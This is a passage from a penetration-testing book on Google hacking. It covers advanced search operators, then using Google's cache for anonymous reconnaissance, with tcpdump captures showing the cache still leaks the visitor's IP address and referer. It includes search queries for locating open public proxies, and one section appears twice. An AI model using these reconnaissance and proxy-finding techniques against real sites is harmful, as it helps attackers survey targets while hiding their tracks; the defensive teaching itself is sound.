msgid: 9t89a0d6laa555njol29t99sUr7eeho6h@4ax.com. The msgid operator does not mix with other operators or search terms. Stocks: Search for Stock Information The stocks operator allows you to search for stock market information about a particular company. The parameter to this operator must be a valid stock abbrevi- ation. 
If you provide an invalid stock ticker symbol, you will be taken to a screen that allows further searching for a correct ticker symbol, as shown in Figure 2.26.

Figure 2.26 Searching for a Valid Stock Symbol
[Figure: Google's financial information page for the query stocks:"computer", reporting that "computer" is not a valid ticker symbol and offering a ticker symbol lookup form.]

The stocks operator cannot be used with other operators or search terms.

Define: Show the Definition of a Term

The define operator returns definitions for a search term. It is simple and straightforward: the argument to this operator may be a word or a phrase. Links to the source of the definition are provided, as shown in Figure 2.27.

Figure 2.27 Results of a Define Search
[Figure: Google results for define:ironic, showing definitions of "ironic" found on the Web, each with a link to its source.]

The define operator cannot be used with other operators or search terms.

Phonebook: Search Phone Listings

The phonebook operator searches for business and residential phone listings.
Three operators can be used for the phonebook search: rphonebook, bphonebook, and phonebook, which will search residential listings, business listings, or both, respectively. The parameters to these operators are all the same and usually consist of a series of words describing the listing and location. In many ways, this operator functions like an allintitle search, since every word listed after the operator is included in the operator search. A query such as phonebook:john darling ny would list both business and residential listings for John Darling in New York. As shown in Figure 2.28, links are provided for popular mapping sites that allow you to view maps of an address or location.

Figure 2.28 The Output of a Phonebook Query
[Figure: Google PhoneBook results for john darling ny, with business listings followed by residential listings. Each listing shows a name, phone number, and address with links to Yahoo! Maps and MapQuest.]

If you were only interested in a residential or business listing, you would use the rphonebook and bphonebook operators, respectively. There are other ways to get to this information without the phonebook operator. If you supply what looks like an address (including a state) or a name and a state as a query, Google will return a link allowing you to map the location in the case of an address (see Figure 2.29) or a phone listing in the case of a name and street match.
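The three phonebook operators described above differ only in their prefix, so query construction is easy to sketch. The following is a minimal illustration, not a tool from this book: the function names are made up for the example, and the base URL with its q parameter is assumed from the address bars visible in this chapter's figures. The sketch only builds strings and does not check whether Google still answers these operators.

```python
from urllib.parse import urlencode

# Operator names as described in the text; the dictionary keys are
# hypothetical labels chosen for this example.
PHONEBOOK_OPERATORS = {
    "both": "phonebook",
    "residential": "rphonebook",
    "business": "bphonebook",
}


def phonebook_query(words, listing="both"):
    """Build a phonebook-style query from a name and location string."""
    operator = PHONEBOOK_OPERATORS[listing]
    # Every word after the operator is treated as part of the operator search,
    # so the words are simply normalized and appended.
    return f"{operator}:{' '.join(words.split())}"


def search_url(query):
    """Turn a query into a search URL (base URL assumed from the figures)."""
    return "http://www.google.com/search?" + urlencode({"q": query})


if __name__ == "__main__":
    query = phonebook_query("john darling ny")
    print(query)              # phonebook:john darling ny
    print(search_url(query))  # http://www.google.com/search?q=phonebook%3Ajohn+darling+ny
    print(phonebook_query("john darling ny", listing="business"))
```

Keeping the operator choice in one small lookup makes it obvious that a residential-only or business-only search is the same query with a different prefix.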
Figure 2.29 Google Understands Addresses
[Figure: Google Web results for 123 stone dr ny. Above the regular results, Google offers a "Map of 123 Stone Dr" entry with links to Yahoo! Maps and MapQuest.]

Underground Googling
Hey, Get Me Outta Here!

If you're concerned about your address information being in Google's databases for the world to see, have no fear. Google makes it possible for you to delete your information so others can't access it via Google. Simply fill out the form at www.google.com/help/pbremoval.html and your information will be removed, usually within 48 hours. This doesn't remove you from the Internet (let us know if you find a link to do that), but the page gives you a decent list of places that list similar information. Oh, and Google is trusting you not to delete other people's information with this form.

The phonebook operators do not provide very informative error messages, and it can be fairly difficult to figure out whether or not you have bad syntax. Consider a query for phonebook:john smith. This query does not return any results, and the results page looks a lot like a standard "no results" page, as shown in Figure 2.30.

Figure 2.30 Phonebook Error Messages Are Very Misleading
[Figure: Google PhoneBook results for john smith. The page reads "Your search - john smith - did not match any documents" and suggests checking spelling, trying different keywords, trying more general keywords, and trying fewer keywords.]
To make matters worse, the suggestions for fixing this query are all wrong. In this case, you need to provide more information in your query to get hits, not fewer keywords, as Google suggests. Consider phonebook:john smith ny, which returns approximately 600 results.

Colliding Operators and Bad Search-Fu

As you start using advanced operators, you'll realize that some combinations work better than others for finding what you're looking for. Just as quickly, you'll begin to realize that some operators just don't mix well at all.

Table 2.3 shows which operators can be mixed with others. Operators listed as "No" should not be used in the same query as other operators. Furthermore, these operators will sometimes give funky results if you get too fancy with their syntax, so don't be surprised when it happens. This table also lists operators that can only be used within specific Google search areas and operators that cannot be used alone.

The values in this table bear some explanation. A box marked "Yes" indicates that the operator works as expected in that context. A box marked "No" indicates that the operator does not work in that context, and Google indicates this with a warning message. Any box marked with "Not really" indicates that Google attempts to translate your query when used in that context. True Google hackers love exploring gray areas like the ones found in the "Not really" boxes.

Table 2.3 Mixing Operators

Operator     Mixes with   Can Be      Web?          Images?       Groups?      News?
             Other        Used
             Operators?   Alone?
intitle      Yes          Yes         Yes           Yes           Yes          Yes
allintitle   No           Yes         Yes           Yes           Yes          Yes
inurl        Yes          Yes         Yes           Yes           Not really   Like intitle
allinurl     No           Yes         Yes           Yes           Yes          Like intitle
filetype     Yes          No          Yes           Yes           No           Not really
allintext    Not really   Yes         Yes           Yes           Yes          Yes
site         Yes          Yes         Yes           Yes           No           Not really
link         No           Yes         Yes           No            No           Not really
inanchor     Yes          Yes         Yes           Yes           Not really   Yes
numrange     Yes          Yes         Yes           No            No           Not really
daterange    Yes          No          Yes           Not really    Not really   Not really
cache        No           Yes         Yes           No            Not really   Not really
info         No           Yes         Yes           Not really    Not really   Not really
related      No           Yes         Yes           No            No           Not really
phonebook,   No           Yes         Yes           No            No           Not really
rphonebook,
bphonebook
author       Yes          Yes         No            No            Yes          Not really
group        Not really   Yes         No            No            Yes          Not really
insubject    Yes          Yes         Like intitle  Like intitle  Yes          Like intitle
msgid        No           Yes         Not really    Not really    Yes          Not really
stocks       No           Yes         No            No            No           Like intitle
define       No           Yes         Yes           Not really    Not really   Not really

Allintext gives all sorts of crazy results when it is mixed with other operators. For example, a search for allintext:moo goo gai filetype:pdf works well for finding Chinese food menus, whereas allintext:Sum Dum Goy intitle:Dragon gives you that empty feeling inside, like a year without the 1985 classic The Last Dragon (see Figure 2.31).

Figure 2.31 Allintext Is Bad Enough to Make You Want to Cry
[Figure: an empty Google results page for the query allintext:Sum Dum Goy intitle:Dragon.]

Despite the fact that some operators do combine with others, it's still possible to get less than optimal results by running your operators head-on into each other. This section focuses on pointing out a few of the potential bad collisions that could cause you headaches.
We'll start with some of the more obvious ones. First, consider a query like something -something. This query returns nothing, and Google tells you as much. This is an obvious example, but consider intitle:something -intitle:something. This query, just like the first, returns nothing, since we've negated our first search with a duplicate NOT search. Literally, we're saying "find something in the title and hide all the results with something in the title." Both of these examples clearly illustrate the point that you can't query for something and negate that query, because your results will be zero.

It gets a bit tricky when the advanced operators start overlapping. Consider site and inurl. The URL includes the name of the site. So, extending the "don't contradict yourself" rule, don't include a term with site and exclude that term with inurl (or vice versa) and expect sane results. A query like site:microsoft.com -inurl:microsoft.com doesn't make much sense at all, and the results are somewhat trippy, as shown in Figure 2.32.

Figure 2.32 No One Said Hackers Obeyed Reality
[Figure: Google results for site:microsoft.com -inurl:microsoft.com, showing three hits whose odd-looking URLs place another host name and the characters %01%00@ in front of a microsoft.com host name.]

These search results, considered junk by most Web searchers, are just the kind of things that Google hackers pride themselves in finding and working with. However, when you're really trying to home in on a topic, keep the "rules" in mind and you'll accelerate toward your target at a much faster pace.
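The "don't contradict yourself" rule lends itself to a quick mechanical check before a query is ever submitted. The sketch below is one hedged way to do that, not anything Google provides: the function names are invented for this example, the non-mixing set is copied from the "No" entries in the first column of Table 2.3, and the parser is deliberately naive (it splits on whitespace, so quoted phrases, multiword all* parameters, and ordering problems are outside its scope).

```python
# Operators that Table 2.3 marks "No" under "Mixes with Other Operators?".
NON_MIXING = {
    "allintitle", "allinurl", "link", "cache", "info", "related",
    "phonebook", "rphonebook", "bphonebook", "msgid", "stocks", "define",
}

# Operator pairs whose search areas overlap: the URL includes the site name.
OVERLAPPING = {("site", "inurl"), ("inurl", "site")}


def parse(query):
    """Split a query into (negated, operator, term) triples.

    The operator is "" for a plain search term.
    """
    parsed = []
    for token in query.lower().split():
        negated = token.startswith("-")
        if negated:
            token = token[1:]
        operator, separator, term = token.partition(":")
        if not separator:
            operator, term = "", token
        parsed.append((negated, operator, term))
    return parsed


def find_problems(query):
    """Return a list of human-readable warnings for a query."""
    tokens = parse(query)
    wanted = {(op, term) for negated, op, term in tokens if not negated}
    problems = []
    for negated, op, term in tokens:
        if not negated:
            continue
        # The same thing is both required and excluded.
        if (op, term) in wanted:
            problems.append(f"{op or 'plain term'} '{term}' is both required and excluded")
        # A term is required in one area and excluded from an overlapping one.
        for wanted_op, wanted_term in wanted:
            if wanted_term == term and (wanted_op, op) in OVERLAPPING:
                problems.append(f"{wanted_op}:{term} overlaps with excluded {op}:{term}")
    operators = {op for _, op, _ in tokens if op}
    if len(operators) > 1:
        for op in sorted(operators & NON_MIXING):
            problems.append(f"{op} does not mix with other operators")
    return problems


if __name__ == "__main__":
    for q in ("something -something",
              "site:microsoft.com -inurl:microsoft.com",
              "allinurl:pdf allintitle:pdf",
              "intitle:dragon site:example.com"):
        print(q, "->", find_problems(q) or "no obvious collisions")
```

A check like this only catches the obvious collisions. The "Not really" cases in Table 2.3 depend on how Google rewrites the query, which a static check cannot predict.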
Save the rule breaking for your required Google hacking license test! Here's a quick breakdown of some broken searches and why they're broken:

■ site:com site:edu  A hit can't be both an edu and a com at the same time. What you're more likely to search for is (site:edu | site:com), which searches for either domain.
■ inanchor:click -click  This is contradictory. Remember, unless you use an advanced operator, your search term can appear anywhere on the page, including title, URL, text, and even anchors.
■ allinurl:pdf allintitle:pdf  Operators starting with all are notoriously bad at combining. Get out of the habit of combining them before you get into the habit of using them! Replace allinurl with inurl, allintitle with intitle, and just don't use allintext. It's evil.
■ site:syngress.com allinanchor:syngress publishing  This query returns zero results, which seems natural considering the last example and the fact that most all* searches are nasty to use. However, this query suffers from an ordering problem, a fairly common problem that can really throw off some narrow searches. By changing the query to allinanchor:syngress publishing site:syngress.com, which moves the allinanchor to the beginning of the query, we can get many more results. This does not at all seem natural, since the allinanchor operator considers all the following terms to be parameters to the operator, but that's just the way it is.
■ link:www.microsoft.com linux  This is a nasty search for a beginner because it appears to work, finding sites that link to Microsoft and mention the word linux on the page. Unfortunately, link doesn't mix with other operators, but instead of sending you an error message, Google "fixes" the query for you and provides the exact results as "link.www.microsoft.com" linux.

Summary

Google offers plenty of options when it comes to performing advanced searches.
URL modification, discussed in the previous chapter, can provide you with lots of options for modifying a previously submitted search, but advanced operators are better used within a query. Easier to remember than the URL modifiers, advanced operators are the truest tools of any Google hacker's arsenal. As such, they should be the tools used by the good guys when considering the protection of Web-based information.

Most of the operators can be used in combination, the most notable exceptions being the allintitle, allinurl, allinanchor, and allintext operators. Advanced Google searchers tend to steer away from these operators, opting to use the intitle, inurl, and link operators to find strings within the title, URL, or links to pages, respectively. Allintext, used to locate all the supplied search terms within the text of a document, is one of the least used and most redundant of the advanced operators. Filetype and site are very powerful operators that search specific sites or specific file types. The daterange operator allows you to search for files that were indexed within a certain time frame. When crawling Web pages, Google generates specific information such as a cached copy of a page, an information snippet about the page, and a list of sites that seem related. This information can be retrieved with the cache, info, and related operators, respectively. To search for the author of a Google Groups document, use the author operator. The phonebook series of operators return business or residential phone listings as well as maps to specific addresses. The stocks operator returns stock information about a specific ticker symbol, whereas the define operator returns the definition of a word or simple phrase.

Solutions Fast Track

Intitle
☑ Finds strings in the title of a page
☑ Mixes well with other operators
☑ Best used with Web, Group, Images, and News searches

Allintitle
☑ Finds all terms in the title of a page
☑ Does not mix well with other operators or search terms
☑ Best used with Web, Group, Images, and News searches

Inurl
☑ Finds strings in the URL of a page
☑ Mixes well with other operators
☑ Best used with Web and Image searches

Allinurl
☑ Finds all terms in the URL of a page
☑ Does not mix well with other operators or search terms
☑ Best used with Web, Group, and Image searches

Filetype
☑ Finds specific types of files based on file extension
☑ Synonymous with ext
☑ Requires an additional search term
☑ Mixes well with other operators
☑ Best used with Web and Group searches

Allintext
☑ Finds all provided terms in the text of a page
☑ Pure evil: don't use it
☑ Forget you ever heard about allintext

Site
☑ Restricts a search to a particular site or domain
☑ Mixes well with other operators
☑ Can be used alone
☑ Best used with Web, Groups, and Image searches

Link
☑ Searches for links to a site or URL
☑ Does not mix with other operators or search terms
☑ Best used with Web searches

Inanchor
☑ Finds text in the descriptive text of links
☑ Mixes well with other operators and search terms
☑ Best used for Web, Image, and News searches

Daterange
☑ Locates pages indexed within a specific date range
☑ Requires a search term
☑ Mixes well with other operators and search terms
☑ Best used with Web searches

Numrange
☑ Finds a number in a particular range
☑ Mixes well with other operators and search terms
☑ Best used with Web searches

Cache
☑ Displays Google's cached copy of a page
☑ Does not mix with other operators or search terms
☑ Best used with Web searches

Info
☑ Displays summary information about a page
☑ Does not mix with other operators or search terms
☑ Best used with Web searches

Related
☑ Shows sites that are related to provided site or URL
☑ Does not mix with other operators or search terms
☑ Best used with Web searches

Phonebook, Rphonebook, Bphonebook
☑ Shows residential or business phone listings
☑ Does not mix with other operators or search terms
☑ Best used as a Web query

Author
☑ Searches for the author of a Group post
☑ Mixes well with other operators and search terms
☑ Best used as a Group search

Group
☑ Searches Group names, selects individual Groups
☑ Mixes well with other operators
☑ Best used as a Group search

Insubject
☑ Locates a string in the subject of a Group post
☑ Mixes well with other operators and search terms
☑ Best used as a Group search

Msgid
☑ Locates a Group message by message ID
☑ Does not mix with other operators or search terms
☑ Best used as a Group search

Stocks
☑ Shows the Yahoo Finance stock listing for a ticker symbol
☑ Does not mix with other operators or search terms
☑ Best provided as a Web query

Define
☑ Shows various definitions of a provided word or phrase
☑ Does not mix with other operators or search terms
☑ Best provided as a Web query

Links to Sites
☑ The Google filetypes FAQ, www.google.com/help/faq_filetypes.html
☑ The resource for file extension information, www.filext.com. This site can help you figure out what program a particular extension is associated with.
☑ http://searchenginewatch.com/searchday/article.php/2160061. This article discusses some of the issues associated with Google's date restrict search options.
☑ Very nice online Julian date converters, www.24hourtranslations.co.uk/dates.htm and www.tesre.bo.cnr.it/~mauro/JD/

Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts.
To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com.

Q: Do other search engines provide some form of advanced operator? How do their advanced operators compare to Google's?

A: Yes, most other search engines offer similar operators. Yahoo is the most similar to Google, in our opinion. This might have to do with the fact that Yahoo once relied solely on Google as its search provider. The operators available with Yahoo include site (domain search), hostname (full server name), link, url (show only one document), inurl, and intitle. The Yahoo advanced search page offers other options and URL modifiers. You can dissect the HTML form at http://search.yahoo.com/search/options to get to the interesting options here. Be prepared for a page that looks a lot like Google's advanced search page.

AltaVista offers domain, host, link, title, and url operators. The AltaVista advanced search page can be found at www.altavista.com/web/adv. Of particular interest is the timeframe search, which allows more granularity than Google's as_qdr URL modifier, allowing you to search either ranges or specific time frames such as the past week, two weeks, or longer.

Q: Where can I get a quick rundown of all the advanced operators?

A: Check out www.google.com/help/operators.html. This page describes various operators and is a good summary of this chapter. It is assumed that new operators are listed on this page when they are released, but keep in mind that some operators enter a beta stage before they are released to the public. Sometimes these operators are discovered by unsuspecting Google users throwing around the colon separator too much. Who knows, maybe you'll be the next person to discover the newest hidden operator!

Q: How can I keep up with new operators as they come out? What about other Google-related news and tips?

A: There are quite a few Web sites that we frequent for news and information about all things Google. The first is www.google.com/googleblog/, Google's official Weblog. Although not necessarily technical in nature, it's a nice way to gain insight into some of the happenings at Google. Another is Aaron Swartz's unofficial Google blog, located at http://google.blogspace.com/. Not endorsed or sponsored by Google, this site is often more pointed, and sometimes more insightful. A third site that's a must-bookmark one is the Google Labs page at http://labs.google.com/. This is one of the best places to get news about new features and capabilities Google has to offer. Also, to get updates about new Google queries, even if they're not Google related, check out www.google.com/alerts, the main Google Alerts page. Google Alerts sends you e-mail when there are updates to a search term. You could use this tool to uncover new operators by alerting on a search term such as google advanced operator site:google.com.

Q: Is the word order in a query significant?

A: Sometimes. If you are interested in the ranking of a site, especially which sites float up to the first few pages, order is very significant. Google will take two adjoining words in a query and try to first find sites that have those words in the order you specified. Switching the order of the words still returns the same exact sites (unless you put quotes around the words, forcing Google to find the words in that order), regardless of which order you provided the terms in your query. To get an idea of how this works, play around with some basic queries such as food clothes and clothes food.

Chapter 3
Google Hacking Basics

Solutions in this Chapter:
■ Using Caches for Anonymity
■ Directory Listings
■ Going Out on a Limb: Traversal Techniques

☑ Summary
☑ Solutions Fast Track
☑ Frequently Asked Questions

Introduction

A fairly large portion of this book is dedicated to the techniques the "bad guys" will use to locate sensitive information. We present this information to help you become better informed about their motives so that you can protect yourself and perhaps your customers. We've already looked at some of the benign basic searching techniques that are foundational for any Google user who wants to break the barrier of the basics and charge through to the next level: the ways of the Google hacker. Now we begin to look at the most basic techniques, and we'll dive into the weeds a bit later on.

For now, we'll first talk about Google's cache. If you haven't already experimented with the cache, you're missing out. We suggest you at least click a few cached links from the Google search results page before reading further. As any decent Google hacker will tell you, there's a certain anonymity that comes with browsing the cached version of a page. That anonymity only goes so far, and there are some limitations to the coverage it provides. Google can, however, very nicely veil your crawling activities to the point that the target Web site might not even get a single packet of data from you as you cruise the Web site. We'll show you how it's done.

Next, we'll talk about directory listings. These "ugly" Web pages are chock full of information, and their mere existence serves as the basis for some of the more advanced attack searches that we'll discuss in later chapters.

To round things out, we'll take a look at a technique that has come to be known as traversing: the expansion of a search to attempt to gather more information.
We'll look at directory traversal, number range expansion, and extension trolling, all of which are techniques that should be second nature to any decent hacker, and to the good guys that defend against them.

Anonymity with Caches

Google's cache feature is truly an amazing thing. The simple fact is that if Google crawls a page or document, you can almost always count on getting a copy of it, even if the original source has since dried up and blown away. Of course the down side of this is that hackers can get a copy of your sensitive data even if you've pulled the plug on that pesky Web server. Another down side of the cache is that the bad guys can crawl your entire Web site (including the areas you "forgot" about) without even sending a single packet to your server. If your Web server doesn't get so much as a packet, it can't write anything to the log files. (You are logging your Web connections, aren't you?) If there's nothing in the log files, you might not have any idea that your sensitive data has been carried away. It's sad that we even have to think in these terms, but untold megabytes, gigabytes, and even terabytes of sensitive data leak from Web servers every day. Understanding how hackers can mount an anonymous attack on your sensitive data via Google's cache is of utmost importance.

Google grabs a copy of most Web data that it crawls. There are exceptions, and this behavior is preventable, as we'll discuss later, but the vast majority of the data Google crawls is copied and filed away, accessible via the cached link on the search page. We need to examine some subtleties to Google's cached document banner. The banner shown in Figure 3.1 was gathered from www.phrack.org.

Figure 3.1 This Cached Banner Contains a Subtle Warning About Images
[Figure: the banner at the top of Google's cached copy of a www.phrack.org page. It explains that the cache is the snapshot Google took of the page as it crawled the Web and that the page may have changed since that time, then adds: "This cached page may reference images which are no longer available. Click here for the cached text only."]

[...]

    ... > 64.233.167.104.80
    21:39:24.719067 IP 64.233.167.104.80 > 192.168.2.32.51670
    21:39:24.720351 IP 64.233.167.104.80 > 192.168.2.32.51670
    21:39:24.731503 IP 192.168.2.32.51670 > 64.233.167.104.80
    21:39:24.897987 IP 192.168.2.32.51672 > 82.165.25.125.80
    21:39:24.902401 IP 192.168.2.32.51671 > 82.165.25.125.80
    21:39:24.922716 IP 192.168.2.32.51673 > 82.165.25.125.80
    21:39:24.927402 IP 192.168.2.32.51674 > 82.165.25.125.80
    21:39:25.017288 IP 82.165.25.125.80 > 192.168.2.32.51672
    21:39:25.019111 IP 82.165.25.125.80 > 192.168.2.32.51672
    21:39:25.019228 IP 192.168.2.32.51672 > 82.165.25.125.80
    21:39:25.023371 IP 82.165.25.125.80 > 192.168.2.32.51671
    21:39:25.025388 IP 82.165.25.125.80 > 192.168.2.32.51671
    21:39:25.[illegible] IP 192.168.2.32.51671 > 82.165.25.125.80
    21:39:25.043418 IP 82.165.25.125.80 > 192.168.2.32.51673
    21:39:25.045573 IP 82.165.25.125.80 > 192.168.2.32.51673
    21:39:25.045707 IP 192.168.2.32.51673 > 82.165.25.125.80
    21:39:25.052853 IP 82.165.25.125.80 > 192.168.2.32.51674

Let's take apart this output a bit. On line 1, we see a Web (port 80) connection from 192.168.2.32, our Web browsing machine, to 64.233.167.104, one of Google's servers.
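Lines 2 and 3 show two response packets, again from the Google server. This is the type of traffic we should expect from any transaction with Google, but beginning on line 5, we see that our machine makes a Web (port 80) connection to 82.165.25.125. This is not a Google server, and if we were to run an nslookup or a host command on that IP address, we would discover that the address resolves to al5151295.alturo-server.de. The connection to this server can be explained by rerunning tcpdump with more options specifically designed to show a few hundred bytes of the data inside the packets as well as the headers. The partial capture shown in Figure 3.3 was gathered by running:

    tcpdump -Xx -s 500 -n

and shift-reloading the cached page. Shift-reloading forces most browsers to contact the Web host again, not relying on any caches the browser might be using.

Figure 3.3 A Partial HTTP Request Showing the Host Header Field

    0x0040  0d6c 4745 5420 2f67 7266 782f 3831 736d  .lGET./grfx/81sm
    0x0050  626c 7565 2e6a 7067 2048 5454 502f 312e  blue.jpg.HTTP/1.
    0x0060  310d 0a48 6f73 743a 2077 7777 2e70 6872  1..Host:.www.phr
    0x0070  6163 6b2e 6f72 670d 0a43 6f6e 6e65 6374  ack.org..Connect
    0x0080  696f 6e3a 206b 6565 702d 616c 6976 650d  ion:.keep-alive.
    0x0090  0a52 6566 6572 6572 3a20 6874 7470 3a2f  .Referer:.http:/
    0x00a0  2f36 342e 3233 332e 3136 312e 3130 342f  /64.233.161.104/
    0x00b0  7365 6172 6368 3f71 3d63 6163 6865 3a4c  search?q=cache:L
    0x00c0  4251 5a49 7253 6b4d 6755 4a3a 7777 772e  BQZIrSkMgUJ:www.
    0x00d0  7068 7261 636b 2e6f 7267 2f2b 2b73 6974  phrack.org/++sit
    0x00e0  653a 7777 772e 7068 7261 636b 2e6f 7267  e:www.phrack.org
    0x00f0  2b70 6872 6163 6b26 686c 3d65 6e0d 0a55  +phrack&hl=en..U

Lines 1 and 2 show that we are downloading (via a GET request) an image file, specifically a JPG image, from the server. Line 3 shows the Host field, which specifies that we are talking to the www.phrack.org Web server. Because of this Host header and the fact that this packet was sent to 82.165.25.125:80, we can safely assume that the Phrack Web server is virtually hosted on the physical server located at 82.165.25.125:80. This means that when we viewed the cached copy of the Phrack Web page, we began pulling images directly from the Phrack server itself. If we were striving for anonymity by viewing the Google cached page, we just blew our cover! Furthermore, lines 6-12 show that the REFERER field was passed to the Phrack server, and that field contained a URL reference to Google's cached copy of Phrack's page. This means that not only were we not anonymous, our browser informed the Phrack Web server that we were trying to view a cached version of the page! So much for anonymity.

It's worth noting that most real hackers use proxy servers when browsing a target's Web pages, and even their Google activities are first bounced off a proxy server. If we had used an anonymous proxy server for our testing, the Phrack Web server would have only gotten our proxy server's IP address, not our actual IP address.

Underground Googling
Google Hacker's Tip

It's a good idea to use a proxy server if you value your anonymity online. Penetration testers use proxy servers to emulate what a real attacker would do during an actual break-in attempt. Locating working, high-quality proxy servers can be an arduous task, unless of course we use a little Google hacking to do the grunt work for us! To locate proxy servers using Google, try these queries:

    inurl:"nph-proxy.cgi" "Start browsing"

or

    "this proxy is working fine!" "enter " URL* visit

These queries locate online public proxy servers that can be used for testing purposes. Nothing like Googling for proxy servers! Remember, though, that there are lots of places to obtain proxy servers, such as the atomintersoft site or the samair.ru proxy site. Try Googling for those!

The cache banner gives us an option to view only the data that Google has captured, without any external references. As you can see in Figure 3.1, a link is available in the header, titled "Click here for the cached text only." Clicking this link produces the tcpdump output shown in Figure 3.4, captured with tcpdump -n.

Figure 3.4 Cached Text Only Captured with Tcpdump

    IP 192.168.2.32.52912 > 64.233.167.104.80: S 2057734012:2057734012(0) win 65535
    IP 64.233.167.104.80 > 192.168.2.32.52912: S 4205028956:4205028956(0) ack 2057734013 win 8190
    IP 192.168.2.32.52912 > 64.233.167.104.80: . ack 1 win 65535
    IP 192.168.2.32.52912 > 64.233.167.104.80: P 1:699(698) ack 1 win 65535
    IP 64.233.167.104.80 > 192.168.2.32.52912: . ack 699 win 15885
    IP 64.233.167.104.80 > 192.168.2.32.52912: . 1:1431(1430) ack 699 win 15885
    23:46:54.127202 IP 64.233.167.104.80 > 192.168.2.32.52912: . 1431:2861(1430) ack 699 win 15885
    IP 64.233.167.104.80 > 192.168.2.32.52912: P 2861:3846(985) ack 699 win 15885
    IP 192.168.2.32.52912 > 64.233.167.104.80: . ack 3846 win 65535
    IP 192.168.2.32.52912 > 64.233.167.104.80: F 699:699(0) ack 3846 win 65535
    IP 64.233.167.104.80 > 192.168.2.32.52912: F 3846:3846(0) ack 700 win 8190
    IP 192.168.2.32.52912 > 64.233.167.104.80: . ack 3847 win 65535

Lines 1-3 show a standard TCP handshake on the Web port (port 80) between our browsing machine (192.168.2.32) and the Google server (64.233.167.104). Lines 4-9 show our Web data transfer as our browsing machine receives data from the Google server, and lines 10-12 show the normal successful shutdown of our communication with the Google server. Despite the fact that we loaded the same page as before, we communicated only with the Google server, not any external servers.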
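
Reading packet captures by eye works for a dozen lines, but the same check can be automated. The sketch below is a minimal illustration under stated assumptions, not a tool from this book: it expects text in the tcpdump -n format shown in the figures above (IPv4 only, with the port as the last dotted field), the function names are invented for the example, and the sample lines are a subset of the captures above.

```python
import re

# Matches the "IP src.port > dst.port" portion of a `tcpdump -n` line.
# IPv4 only; the final dotted field of each endpoint is the port number.
PACKET = re.compile(
    r"IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+)"
)


def remote_hosts(lines, local_ip):
    """Return the set of (ip, port) endpoints that local_ip exchanged packets with."""
    peers = set()
    for line in lines:
        match = PACKET.search(line)
        if not match:
            continue  # not a packet line in the expected format
        src, sport, dst, dport = match.groups()
        if src == local_ip:
            peers.add((dst, int(dport)))
        elif dst == local_ip:
            peers.add((src, int(sport)))
    return peers


def unexpected_hosts(lines, local_ip, expected_ips):
    """List remote IP addresses that are not in the expected set."""
    seen = {ip for ip, _ in remote_hosts(lines, local_ip)}
    return sorted(seen - set(expected_ips))


# A few lines from the capture of the normal cached page.
FULL_CACHE = [
    "21:39:24.719067 IP 64.233.167.104.80 > 192.168.2.32.51670",
    "21:39:24.731503 IP 192.168.2.32.51670 > 64.233.167.104.80",
    "21:39:24.897987 IP 192.168.2.32.51672 > 82.165.25.125.80",
    "21:39:25.017288 IP 82.165.25.125.80 > 192.168.2.32.51672",
]

# A few lines from the capture of the cached text only.
TEXT_ONLY = [
    "IP 192.168.2.32.52912 > 64.233.167.104.80: P 1:699(698) ack 1 win 65535",
    "IP 64.233.167.104.80 > 192.168.2.32.52912: . ack 699 win 15885",
]

if __name__ == "__main__":
    google = {"64.233.167.104"}
    print(unexpected_hosts(FULL_CACHE, "192.168.2.32", google))  # ['82.165.25.125']
    print(unexpected_hosts(TEXT_ONLY, "192.168.2.32", google))   # []
```

An empty list for the text-only capture matches the conclusion above: the browser talked only to the Google server. In practice the set of expected addresses would need to cover every Google server the browser might reach, which this sketch leaves to the caller.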
Line 3 shows the Host field, which specifies that we are talking to the www.phrack.org Web server. Because of this Host header and the fact that this packet was sent to 82.165.25.125 on port 80, we can safely assume that the Phrack Web server is virtually hosted on the physical server located at 82.165.25.125. This means that when we viewed the cached copy of the Phrack Web page, we began pulling images directly from the Phrack server itself. If we were striving for anonymity by viewing the Google cached page, we just blew our cover! Furthermore, lines 6-12 show that the REFERER field was passed to the Phrack server, and that field contained a URL reference to Google's cached copy of Phrack's page. This means that not only were we not anonymous, our browser informed the Phrack Web server that we were trying to view a cached version of the page! So much for anonymity.

It's worth noting that most real hackers use proxy servers when browsing a target's Web pages, and even their Google activities are first bounced off a proxy server. If we had used an anonymous proxy server for our testing, the Phrack Web server would have only gotten our proxy server's IP address, not our actual IP address.

Underground Googling...
Google Hacker's Tip

It's a good idea to use a proxy server if you value your anonymity online. Penetration testers use proxy servers to emulate what a real attacker would do during an actual break-in attempt. Locating working, high-quality proxy servers can be an arduous task, unless of course we use a little Google hacking to do the grunt work for us! To locate proxy servers using Google, try these queries:

    inurl:"nph-proxy.cgi" "Start browsing"

or

    "this proxy is working fine!" "enter *" "URL***" * visit

These queries locate online public proxy servers that can be used for testing purposes. Nothing like Googling for proxy servers!
Remember, though, that there are lots of places to obtain proxy servers, such as the atomintersoft site or the samair.ru proxy site. Try Googling for those!

The cache banner gives us an option to view only the data that Google has captured, without any external references. As you can see in Figure 3.1, a link is available in the header, titled "Click here for the cached text only." Clicking this link produces the tcpdump output shown in Figure 3.4, captured with tcpdump -n.

Figure 3.4 Cached Text Only Captured with Tcpdump

    IP 192.168.2.32.52912 > 64.233.167.104.80: S 2057734012:2057734012(0) win 65535
    IP 64.233.167.104.80 > 192.168.2.32.52912: S 4205028956:4205028956(0) ack 2057734013 win 8190
    IP 192.168.2.32.52912 > 64.233.167.104.80: . ack 1 win 65535
    IP 192.168.2.32.52912 > 64.233.167.104.80: P 1:699(698) ack 1 win 65535
    IP 64.233.167.104.80 > 192.168.2.32.52912: . ack 699 win 15885
    IP 64.233.167.104.80 > 192.168.2.32.52912: . 1:1431(1430) ack 699 win 15885
    23:46:54.127202 IP 64.233.167.104.80 > 192.168.2.32.52912: . 1431:2861(1430) ack 699 win 15885
    IP 64.233.167.104.80 > 192.168.2.32.52912: P 2861:3846(985) ack 699 win 15885
    IP 192.168.2.32.52912 > 64.233.167.104.80: . ack 3846 win 65535
    IP 192.168.2.32.52912 > 64.233.167.104.80: F 699:699(0) ack 3846 win 65535
    IP 64.233.167.104.80 > 192.168.2.32.52912: F 3846:3846(0) ack 700 win 8190
    IP 192.168.2.32.52912 > 64.233.167.104.80: . ack 3847 win 65535

